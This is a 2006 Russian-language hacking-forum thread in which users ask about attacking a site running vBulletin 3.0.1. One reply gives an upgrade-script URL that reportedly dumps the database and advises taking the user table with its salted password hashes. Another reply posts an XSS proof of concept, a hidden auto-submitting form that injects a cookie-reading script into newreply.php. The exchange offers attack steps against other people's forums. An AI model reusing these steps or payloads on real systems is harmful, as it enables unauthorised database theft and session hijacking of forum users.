ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос про уязвимости в vbulletin 3.0.1
  #1  
Старый 03.08.2006, 20:52
Manoz
Познающий
Регистрация: 15.02.2005
Сообщений: 39
Провел на форуме:
280185

Репутация: 7
Отправить сообщение для Manoz с помощью ICQ
По умолчанию Вопрос про уязвимости в vbulletin 3.0.1

Есть форум с vb 3.0.1. Какие уязвимости у него есть? А то тут старые посты стерли и не могу найти инфу.
Спасиб
 
Ответить с цитированием

  #2  
Старый 03.08.2006, 21:12
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

скорее всего это фэйк, версию намерено изменили и скрывают..... хотя хз
 
Ответить с цитированием

  #3  
Старый 03.08.2006, 22:01
LoneWolf666
Постоянный
Регистрация: 09.12.2005
Сообщений: 377
Провел на форуме:
2046072

Репутация: 362
По умолчанию

www.site forumpath*.domen/install/upgrade_301.php?step=SomeWord
Возможность сделать дамп базы.
Относительно стабильно работает на 3.0.1.

*либо www.forum.site.domen либо www.site.domen/forum/...
Попробуй.
Хеши - солёные. Соль - последния столбец таблицы.
Если покатит - советую делать дамп таблицы user (мэйби vb_user)
Будет проще, меньше размером, да и нах тебе остальное?
 
Ответить с цитированием

  #4  
Старый 08.08.2006, 20:24
Manoz
Познающий
Регистрация: 15.02.2005
Сообщений: 39
Провел на форуме:
280185

Репутация: 7
Отправить сообщение для Manoz с помощью ICQ
По умолчанию

Ща попробую! Спасибо за инфу! ++

Эх жалко. Действительно 3.0.1 мулька. =(

Последний раз редактировалось Manoz; 08.08.2006 в 20:29..
 
Ответить с цитированием

  #5  
Старый 08.08.2006, 21:20
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию

а так чаще всего =))) просто нусам подумай, у кого может стоять такие древние форумы?? =))) они обычно сами орут "ВЫШЛА НОВАЯ ВЕРСИЯ УСТАНОВИТЕ!"
 
Ответить с цитированием

  #6  
Старый 09.11.2006, 19:42
JIaMo
Новичок
Регистрация: 24.09.2006
Сообщений: 10
Провел на форуме:
44609

Репутация: 1
Отправить сообщение для JIaMo с помощью ICQ
По умолчанию

а есть тут еще уязвимости??
 
Ответить с цитированием

  #7  
Старый 09.11.2006, 20:11
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию

где тут? в этой версии?
 
Ответить с цитированием

  #8  
Старый 10.11.2006, 19:16
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036

Репутация: 726


Отправить сообщение для _GaLs_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от JIaMo  
а есть тут еще уязвимости??
Программа: vBulletin 3.0.1

Опасность: Низкая

Наличие эксплоита: Да

Описание: Обнаружена уязвимость в vBulletin. Удаленный атакующий может получить доступ к важной информации пользователей.

Пример/Эксплоит:

<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;& gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
&lt;script&gt;
document.all.preview.click();
&lt;/script&gt;
 
Ответить с цитированием

  #9  
Старый 10.11.2006, 21:51
JIaMo
Новичок
Регистрация: 24.09.2006
Сообщений: 10
Провел на форуме:
44609

Репутация: 1
Отправить сообщение для JIaMo с помощью ICQ
По умолчанию

и че с этим делать?
 
Ответить с цитированием

  #10  
Старый 11.11.2006, 00:41
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

На хер намотай...
__________________
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос про уязвимости в FastBB deo Форумы 9 29.11.2004 09:47
Вопрос про уязвимости в Vbulletin version 2.2.7 mynhauzen Форумы 3 04.08.2004 12:14
Вопрос про уязвимости в exbb Форумы 1 02.08.2004 19:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ